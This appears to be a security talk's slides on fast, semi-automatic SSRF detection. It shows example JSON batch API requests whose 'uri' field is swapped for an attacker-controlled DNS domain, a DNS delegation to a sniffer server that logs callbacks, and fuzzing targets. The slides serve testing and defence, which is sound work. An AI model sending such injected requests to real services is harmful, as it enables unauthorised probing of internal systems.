Fast (and almost automatic) SSRF detection
Fast (and almost automatic) SSRF
detection
Eldar Zaitov
Fast (and almost automatic) SSRF detection
Whoami
• Yandex
• More Smoked Leet Chicken CTF team
• CTFtime.org
Fast (and almost automatic) SSRF detection
Server Side Request Forgery
Fast (and almost automatic) SSRF detection
SSRF sources
• XXE and variations
• Declared functionality
• Errors in URL generation
Fast (and almost automatic) SSRF detection
POST /ws/mail/v2.0/jsonrpc
Content-Type: application/json
{
"method":"GetUserData",
"params":[
{"includeUnverifiedExtAcct":true}
]
}
http://internal.host.com/ws/mail/v2.0/jsonrpc
Fast (and almost automatic) SSRF detection
POST /ws/v3/batch HTTP/1.1
Content-Type: application/json
{ "requests": [ { "method":"POST",
"uri":"/ws/mail/v2.0/jsonrpc", "payload":
{ "method":"GetUserData",
"params":[{"includeUnverifiedExtAcct":true}]}
} ]
}
http://internal.host.com/ws/mail/v2.0/jsonrpc
Fast (and almost automatic) SSRF detection
Detection
• Output / Error based
• Backconnect
• DNS
Fast (and almost automatic) SSRF detection
POST /ws/v3/batch HTTP/1.1
Content-Type: application/json
{ "requests": [ { "method":"POST",
"uri":“.zndemo.kyprizel.net/", "payload":
{ "method":"GetUserData",
"params":[{"includeUnverifiedExtAcct":true}]}
} ]
}
http://internal.host.zndemo.kyprizel.net/
Fast (and almost automatic) SSRF detection
http://some.internal.domain.and.host.com.zndemo.kyprizel.net/
Fast (and almost automatic) SSRF detection
Detection / DNS
sniffer
zndemo
IN
IN
A
NS
37.9.65.78
sniffer.kyprizel.net
Fast (and almost automatic) SSRF detection
Fuzzing
• Request parameters, headers
• Request body:
• multipart/formdata
• XML
• application/json
• whatever
Fast (and almost automatic) SSRF detection
Detection / tools
• Burp suite plugin
• Fuzzer
• DNS server (optional)
https://github.com/kyprizel/ussrfuzzer
@kyprizel
© Copyright 2025